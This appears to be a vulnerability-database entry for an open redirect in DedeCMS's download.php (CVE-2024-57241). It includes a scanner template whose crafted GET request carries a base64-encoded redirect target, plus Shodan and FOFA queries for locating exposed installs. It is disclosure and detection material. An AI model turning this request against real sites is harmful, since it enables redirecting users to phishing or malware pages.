/Vulnerability Library

DedeCMS - Open Redirect via download.php

CVE-2024-57241
Verified

Description

Dedecms 5.71sp1 and earlier contain a URL redirect caused by a logic error that does not properly validate GET request input, letting attackers redirect users to arbitrary URLs, exploit requires sending crafted GET requests.

Severity

Medium

CVSS Score

6.1

Exploit Probability

1%

Affected Product

dedecms

Published Date

March 29, 2026

Template Author

0x_akoko

CVE-2024-57241.yaml
id: CVE-2024-57241

info:
  name: DedeCMS - Open Redirect via download.php
  author: 0x_Akoko
  severity: medium
  description: |
    Dedecms 5.71sp1 and earlier contain a URL redirect caused by a logic error that does not properly validate GET request input, letting attackers redirect users to arbitrary URLs, exploit requires sending crafted GET requests.
  impact: |
    Attackers can redirect users to malicious sites, potentially leading to phishing or malware distribution.
  remediation: |
    Update to the latest version of Dedecms or apply security patches addressing URL redirect issues.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-57241
    - https://github.com/woshidaheike/dedecms-url-redirection
  classification:
    cve-id: CVE-2024-57241
    epss-score: 0.01112
    epss-percentile: 0.62025
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    verified: true
    max-request: 2
    vendor: dedecms
    product: dedecms
    shodan-query: 'http.title:"DedeCMS"'
    fofa-query: 'body="DedeCMS" || body="/plus/download.php"'
  tags: cve,cve2024,dedecms,redirect,cms

http:
  - raw:
      - |
        GET /plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA== HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'location == "https://interact.sh"'
        condition: and
# digest: 490a00463044022056c5f7ade5009b85f525ea77e399a7d55a7fa2c15e615a3de72f30dc8b184f5502207f21542718529d0f1931c8db7ee9f11a4df4bdf6bb349fc85e4e839a0a56efab:922c64590222798bb761d5b6d8e72950
6.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2024-57241
CWE ID:
cwe-601

References

https://nvd.nist.gov/vuln/detail/CVE-2024-57241https://github.com/woshidaheike/dedecms-url-redirection

Remediation Steps

Update to the latest version of Dedecms or apply security patches addressing URL redirect issues.